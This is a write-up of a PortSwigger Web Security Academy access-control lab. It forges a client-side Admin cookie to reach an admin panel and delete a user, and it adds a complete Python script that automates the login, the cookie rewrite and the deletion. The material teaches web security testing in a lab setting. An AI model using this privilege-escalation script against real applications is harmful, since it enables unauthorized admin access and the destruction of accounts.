User role controlled by request parameter

https://portswigger.net/web-security/learning-paths/server-side-vulnerabilities-apprentice/access-control-apprentice/access-control/lab-user-role-controlled-by-request-parameter

Description

This lab has an admin panel at /admin, which identifies administrators using a forgeable cookie.

Solve the lab by accessing the admin panel and using it to delete the user carlos.

You can log in to your own account using the following credentials: wiener:peter

Solution

As the description says, we know the path of the admin panel, but without administrator privileges a direct request to /admin is refused.

So we log in normally with the given credentials: wiener:peter

Analysing the HTTP response after login, we can see that the server sets two cookies: the session ID and an admin flag whose value is false:

Because that flag is sent by the client and trusted by the server, setting it to true gives us a vertical privilege escalation: the user's role is decided by a request parameter, not by the server-side session. The session ID itself is left untouched, so the server still sees a valid, logged-in user.

So we set the admin flag to true in the cookie and request the admin panel:

Now we can finish by deleting the user carlos from the admin panel:
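To make the steps above reproducible, here is an added example (not part of the original writeup) that drives the lab with Python's standard library only. Because the page does not state them, the following are assumptions: the login form is at /login and carries a hidden csrf field whose token is bound to the pre-login session cookie, the admin flag cookie is literally named Admin, and the admin panel links to the deletion endpoint with an href that contains the victim's username. The lab's base URL is taken from the command line.

```python
"""Forge the client-controlled admin flag from the lab writeup above.

Added example, not the original page's code.  Assumed (not stated on the
page): login form at /login with a hidden "csrf" field, the role flag is
the cookie "Admin=false", and the admin panel links to the delete endpoint
with an href containing the victim's username.
"""
import re
import sys
import urllib.error
import urllib.parse
import urllib.request
from http.cookies import SimpleCookie

ADMIN_FLAG = "Admin"  # assumed name of the role-flag cookie


def parse_set_cookie(set_cookie_headers):
    """Load every Set-Cookie header of a response into one jar."""
    jar = SimpleCookie()
    for header in set_cookie_headers:
        jar.load(header)
    return jar


def cookie_header(jar):
    """Serialise a jar as the value of a request Cookie header."""
    return "; ".join(f"{name}={morsel.value}" for name, morsel in jar.items())


def forge_admin_cookie(set_cookie_headers, flag_name=ADMIN_FLAG):
    """Flip only the role flag; keep the real session ID so the server
    still sees a logged-in user.  Raises if the flag is absent, i.e. the
    target does not expose its role decision in a cookie."""
    jar = parse_set_cookie(set_cookie_headers)
    if flag_name not in jar:
        raise ValueError(f"no {flag_name} cookie in login response")
    jar[flag_name] = "true"  # the whole vulnerability: the server trusts this
    return cookie_header(jar)


def find_delete_link(admin_html, username="carlos"):
    """Scrape the deletion link for `username` from the admin panel instead
    of hard-coding a path the writeup never states."""
    match = re.search(r'href="([^"]*%s[^"]*)"' % re.escape(username), admin_html)
    if not match:
        raise ValueError(f"no link for {username} in admin panel")
    return match.group(1)


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    # Login answers with a 302; we need its Set-Cookie headers, not the target page.
    def redirect_request(self, *args, **kwargs):
        return None


def _request(url, data=None, cookie=None):
    """Return (status, headers, body) without following redirects."""
    req = urllib.request.Request(url, data=data)
    if cookie:
        req.add_header("Cookie", cookie)
    opener = urllib.request.build_opener(_NoRedirect)
    try:
        with opener.open(req) as resp:
            return resp.status, resp.headers, resp.read().decode(errors="replace")
    except urllib.error.HTTPError as err:
        return err.code, err.headers, err.read().decode(errors="replace")


def solve(base, username="wiener", password="peter", victim="carlos"):
    # 1. Fetch the login page: pre-login session cookie plus CSRF token (assumed).
    _, hdrs, body = _request(base + "/login")
    pre_login = cookie_header(parse_set_cookie(hdrs.get_all("Set-Cookie") or []))
    fields = {"username": username, "password": password}
    csrf = re.search(r'name="csrf" value="([^"]+)"', body)
    if csrf:
        fields["csrf"] = csrf.group(1)
    # 2. Log in as the low-privileged user; the response sets session + Admin=false.
    _, hdrs, _ = _request(base + "/login",
                          data=urllib.parse.urlencode(fields).encode(), cookie=pre_login)
    # 3. Flip the flag client-side.
    forged = forge_admin_cookie(hdrs.get_all("Set-Cookie") or [])
    # 4. The admin panel now opens because the role comes from the request.
    status, _, panel = _request(base + "/admin", cookie=forged)
    if status != 200:
        raise RuntimeError(f"/admin returned {status}; flag not trusted?")
    # 5. Follow the panel's own delete link for the victim.
    link = find_delete_link(panel, victim)
    status, _, _ = _request(urllib.parse.urljoin(base + "/", link), cookie=forged)
    return status


if __name__ == "__main__":
    print(solve(sys.argv[1].rstrip("/")))
```

Run it as `python3 solve.py https://<lab-id>.web-security-academy.net`; a 200 or 302 from the delete link means carlos is gone. The check worth keeping from this script is forge_admin_cookie: it only rewrites the one cookie, so if the server ever stops sending the flag (the proper fix is to derive the role from the server-side session keyed by the session ID), the function fails loudly instead of silently sending a stale guess.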
